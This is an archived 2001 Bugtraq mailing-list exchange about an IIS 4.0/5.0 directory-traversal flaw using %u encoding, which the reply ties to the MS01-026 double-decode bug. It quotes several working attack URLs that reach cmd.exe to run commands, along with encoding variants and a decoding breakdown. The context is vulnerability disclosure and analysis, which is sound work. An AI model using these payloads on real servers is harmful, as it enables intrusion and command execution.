Re: New vulnerability in IIS4.0/5.0

From: Dave Ahmad (da@securityfocus.com)
Date: 09/19/01


Date: Wed, 19 Sep 2001 13:50:02 -0600 (MDT)
From: Dave Ahmad <da@securityfocus.com>
To: ALife // BERG <buginfo@inbox.ru>
Subject: Re: New vulnerability in IIS4.0/5.0
Message-ID: <Pine.GSO.4.30.0109191127570.19628-100000@mail>


This seems to be just be another way to exploit the double decode
vulnerability (Bugtraq ID 2708). There is a possibility that it may be a
new issue due to the use of '%u' method of encoding. It does not look
that way to us.

On our test machines (and at eEye), systems do not seem to be vulnerable
after applying the MS01-026 hotfix (or the MS01-044 patch).

Ryan Permeh of eEye Digital Security provided a breakdown of an encoded
attack string:

The attack string used successfully against an IIS server (Win2K, SP2):

http://localhost/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe?/c
+dir+c:\

first decode sequence(it replaces %u0025 with %)
http://localhost/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\

second decode sequence (it replaces %u005c with /)
http://localhost/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\

The double decode vulnerability is fixed in MS01-026. I believe the fix
is included in the cumulative patch released with MS01-044.

It doesn't look like a new vulnerability, but we are awaiting confirmation
from Microsoft.

Has anyone managed to exploit a patched system?

Thanks Ryan & eEye.

Regards,

Dave Ahmad
Security Focus
www.securityfocus.com

On Wed, 19 Sep 2001, ALife // BERG wrote:

> -----[ Bright Eyes Research Group | Advisory # be00001e ]-----------------
>
> Remote users can execute any command on several
> IIS 4.0 and 5.0 systems by using UTF codes
>
> -------------------------------------[ security.instock.ru ]--------------
>
> Topic: Remote users can execute any command on several
> IIS 4.0 and 5.0 systems by using UTF codes
>
> Announced: 2001-09-19
> Credits: ALife <buginfo@inbox.ru>
> Affects: Microsoft IIS 4.0/5.0
>
> --------------------------------------------------------------------------
>
> ---[ Description
>
> For example, target has a virtual executable directory (e.g.
> "scripts") that is located on the same driver of Windows system.
> Submit request like this:
>
> http://target/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
>
> Directory list of C:\ will be revealed.
>
> Of course, same effect can be achieved by this kind of processing
> to '/' and '.'. For example: "..%u002f", ".%u002e/", "..%u00255c",
> "..%u0025%u005c" ...
>
> Note: Attacker can run commands of IUSR_machinename account privilege
> only.



Relevant Pages

  • MDKSA-2004:071 - Updated samba packages fix vulnerability in SWAT, samba-server.
    ... A vulnerability was discovered in SWAT, ... The routine used to decode the base64 data during HTTP basic ... authentication is subject to a buffer overrun caused by an invalid ... the GPG public key of the Mandrakelinux Security Team by executing: ...
    (Bugtraq)
  • [Full-Disclosure] MDKSA-2004:071 - Updated samba packages fix vulnerability in SWAT, samba-server.
    ... A vulnerability was discovered in SWAT, ... The routine used to decode the base64 data during HTTP basic ... authentication is subject to a buffer overrun caused by an invalid ... the GPG public key of the Mandrakelinux Security Team by executing: ...
    (Full-Disclosure)
  • [EEYEB20050510] - Microsoft DirectShow Remote Code Vulnerability
    ... Microsoft DirectShow Remote Code Vulnerability ... eEye Digital Security has discovered a vulnerability in the Windows ... identified in a component of DirectX. ...
    (Bugtraq)
  • [VulnWatch] [EEYEB20050510] - Microsoft DirectShow Remote Code Vulnerability
    ... Microsoft DirectShow Remote Code Vulnerability ... eEye Digital Security has discovered a vulnerability in the Windows ... identified in a component of DirectX. ...
    (VulnWatch)
  • [Full-Disclosure] Misinformation in Security Advisories (ASN.1)
    ... this impact of this misinformation is that many corporations out there spent tens of thousands of dollars in resources and manpower last week to get this issue fixed enterprise-wide. ... When Sinan Eren questioned the exploitability of this issue, there was no response from Eeye: ... For a company that does so much quality vulnerability research and employs many talented people, it's very disappointing to see what honestly can't be characterized as anything but deliberate misinformation. ... I'd like to ask someone from Eeye to respond to these claims, but honestly they're not the only security researchers guilty of this. ...
    (Full-Disclosure)